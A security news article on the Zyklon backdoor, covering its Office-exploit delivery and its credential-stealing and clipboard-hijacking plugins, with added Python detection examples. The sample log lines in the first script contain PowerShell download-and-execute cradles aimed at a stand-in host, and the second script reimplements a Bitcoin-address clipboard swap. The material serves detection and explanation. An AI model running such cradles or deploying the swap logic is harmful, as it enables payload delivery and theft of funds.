
Zyklon HTTP malware creates gaping backdoors through MS Office exploits

22 Jan 18

Telecommunications, insurance and financial services providers are the latest targets of Zyklon, a multi-featured backdoor that can carry out attacks ranging from DDoS to keylogging.

FireEye researchers Swapnil Patil and Yogesh Londhe explain that although Zyklon has been in the wild since 2016, the recent wave delivers it through malicious attachments to spam emails.

Zyklon HTTP is described as a publicly available, fully featured backdoor that can conduct DDoS attacks, steal passwords, log keystrokes, update and remove itself, and download additional plugins.

The malware sells for $75-$125 on underground marketplaces.

The latest wave arrives as a spam email carrying a .ZIP attachment; the archive contains a malicious .DOC file.

“The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over,” the researchers explain.

They go on to say that the PowerShell stage downloads the final payload from the command-and-control (C2) server and executes it.

Two of those vulnerabilities are detailed in the report. The first, CVE-2017-8759, is a remote code execution flaw in the .NET Framework's SOAP WSDL parser that an attacker can trigger from a malicious Office document.

The second, CVE-2017-11882, is a recently disclosed stack buffer overflow in the Equation Editor component (EQNEDT32.EXE) that ships with Microsoft Office 2007, 2010, 2013 and 2016.

Microsoft classes it as a ‘Microsoft Office Memory Corruption Vulnerability’; a crafted document lets an attacker execute arbitrary code in the context of the current user.
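The chain the researchers describe (weaponised .DOC, Office exploit, PowerShell stage fetching the payload from the C2 server) leaves a distinctive trace on the endpoint: an Office process, or EQNEDT32.EXE in the Equation Editor case, spawning a script host whose command line carries a download cradle. The Python below is an added example, not code from the article or from the FireEye report. It scans constructed process-creation records (the key=value record format, the file paths and the example.invalid URLs are assumptions made for this example, not captured data) and flags that pattern, decoding a PowerShell -EncodedCommand blob so the cradle cannot hide behind base64.

```python
import base64
import re

# Parent processes that should essentially never spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Strings typical of a PowerShell download cradle fetching a second stage.
CRADLE_PATTERNS = {
    "webclient": re.compile(r"net\.webclient", re.I),
    "downloadstring": re.compile(r"downloadstring", re.I),
    "downloadfile": re.compile(r"downloadfile", re.I),
    "invoke-webrequest": re.compile(r"invoke-webrequest|\biwr\b", re.I),
    "iex": re.compile(r"invoke-expression|\biex\b", re.I),
    "bits": re.compile(r"bitsadmin|start-bitstransfer", re.I),
}
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script text).
ENCODED_CMD = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
# key=value and key="quoted value" pairs of the assumed record format.
KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_line(line):
    """Parse one 'key=value key="quoted value"' process-creation record into a dict."""
    fields = {}
    for m in KV.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return fields


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or '' if absent or undecodable."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(fields):
    """Return a finding dict for an Office-spawned script host, else None."""
    parent = basename(fields.get("parent", ""))
    image = basename(fields.get("image", ""))
    cmdline = fields.get("cmdline", "")
    if parent not in OFFICE_PARENTS or image not in SCRIPT_HOSTS:
        return None
    reasons = [f"{parent} spawned {image}"]
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:                      # scan the plaintext script as well as the raw command line
        reasons.append("encoded command")
        text += " " + decoded
    hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
    reasons.extend(hits)
    # Office -> script host alone is worth a look; with a download cradle it is the Zyklon pattern.
    return {"parent": parent, "image": image,
            "severity": "high" if hits else "medium", "reasons": reasons}


def scan(log_text):
    """Run classify() over every record; return findings with their 1-based line numbers."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        finding = classify(parse_line(line))
        if finding:
            finding["line"] = n
            findings.append(finding)
    return findings


# Constructed sample records (not captured from a real infection); the third one hides
# its cradle in an -enc blob, built here so the example stays self-contained.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')".encode("utf-16-le")
).decode()
SAMPLE_LOG = f"""
ts=2018-01-22T09:00:01Z parent="C:\\Windows\\explorer.exe" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe Get-ChildItem C:\\Users"
ts=2018-01-22T09:03:12Z parent="C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s1')"
ts=2018-01-22T09:05:40Z parent="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /c powershell -enc {_ENCODED}"
ts=2018-01-22T09:07:03Z parent="C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe -c Get-Date"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['severity']}: {'; '.join(f['reasons'])}")
```

The parent/child pairing is the durable part of the detection: the cradle strings change from campaign to campaign, but a document exploit still has to get from Office (or from EQNEDT32.EXE, which runs as a separate process) to a script host. Treat the medium findings as triage candidates rather than noise; a benign macro that shells out looks identical at this layer.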

The researchers also say that Zyklon routes its command-and-control communication over the Tor network.

Researchers say that Zyklon can download additional plugins that include:

Browser Password Recovery, which can recover passwords from popular web browsers including Google Chrome, Mozilla Firefox, Apple Safari, Internet Explorer, Comodo Dragon Browser, Opera Browser, Chrome Canary/SXS, CoolNovo Browser, Flock Browser, SeaMonkey Browser and SRWare Iron Browser.

FTP Password Recovery, which can steal passwords from FTP applications including FileZilla, Dreamweaver, SmartFTP, FlashFXP, FTPCommander and WS_FTP.

Gaming Software Key Recovery, which steals keys from games including Age of Empires, FIFA, Call of Duty, NFS, The Sims, Quake, Half-Life, IGI and Star Wars.

Email Password Recovery, which can steal passwords from Microsoft Outlook and Microsoft Outlook Express, Mozilla Thunderbird, Windows Live Mail 2012, Incredimail, Foxmail, Windows Live Messenger, MSN Messenger, Windows Credential Manager, Google Talk, Gmail Notifier, PaltalkScene IM, Pidgin Messenger and Miranda Messenger.

Licence Key Recovery, which steals serial keys from popular software including Adobe, Microsoft Office, SQL Server and Nero.

Socks5 Proxy, which creates a reverse SOCKS5 proxy server on the infected host.

Zyklon can also hijack the user’s clipboard, replacing a copied Bitcoin address with one supplied by the Zyklon control server.
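A clipper of this kind has to recognise a Bitcoin address in arbitrary clipboard text, and the same recognition logic gives a defender a check: the address being pasted into a wallet should be the one that was copied. The Python below is an added example, not Zyklon's code and not taken from the article or the FireEye report. It validates legacy (P2PKH/P2SH) addresses with Base58Check, reproduces the swap in a pure function, and flags a copied/pasted mismatch; the attacker address is constructed from an arbitrary 20-byte hash for the example, and the copied address is the well-known Bitcoin genesis address.

```python
import hashlib
import re

# Base58 alphabet used by Bitcoin (no 0, O, I or l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Loose shape of a legacy address; the checksum below does the real work.
ADDRESS_CANDIDATE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")


def b58encode(data):
    """Base58 encoding; each leading zero byte becomes a leading '1'."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def b58decode(s):
    """Inverse of b58encode; raises ValueError on a character outside the alphabet."""
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + raw


def checksum(payload):
    """First four bytes of double-SHA256, as used by Base58Check."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def is_valid_legacy_address(s):
    """True for a well-formed Base58Check address of 1 version byte + 20-byte hash."""
    if not ADDRESS_CANDIDATE.fullmatch(s):
        return False
    try:
        data = b58decode(s)
    except ValueError:
        return False
    return len(data) == 25 and checksum(data[:21]) == data[21:]


def address_from_hash160(version, h160):
    """Build a Base58Check address from a version byte and a 20-byte hash."""
    payload = bytes([version]) + h160
    return b58encode(payload + checksum(payload))


def clip_swap(clipboard_text, attacker_address):
    """What the clipper does: replace every valid address in the clipboard text."""
    return ADDRESS_CANDIDATE.sub(
        lambda m: attacker_address if is_valid_legacy_address(m.group(0)) else m.group(0),
        clipboard_text)


def detect_swap(copied, pasted):
    """Defender-side check: a valid address was copied but a different valid one is being pasted."""
    copied, pasted = copied.strip(), pasted.strip()
    return (is_valid_legacy_address(copied) and is_valid_legacy_address(pasted)
            and copied != pasted)


# Constructed attacker address: P2PKH version byte 0x00 over an arbitrary 20-byte value
# (not a real wallet); the copied address is the Bitcoin genesis-block address.
ATTACKER_ADDRESS = address_from_hash160(0x00, hashlib.sha256(b"constructed attacker key").digest()[:20])
GENESIS_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"

if __name__ == "__main__":
    pasted = clip_swap(f"send to {GENESIS_ADDRESS} please", ATTACKER_ADDRESS)
    print(pasted)
    print("swap detected:", detect_swap(GENESIS_ADDRESS, ADDRESS_CANDIDATE.search(pasted).group(0)))
```

The checksum is what makes the swap reliable for the attacker: a regex alone would also rewrite random Base58-looking strings and get noticed, whereas a Base58Check-valid match is almost certainly a real address. For the same reason, a wallet or clipboard monitor that re-validates and compares the pasted address against the copied one catches the substitution regardless of which attacker address the C2 hands out.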
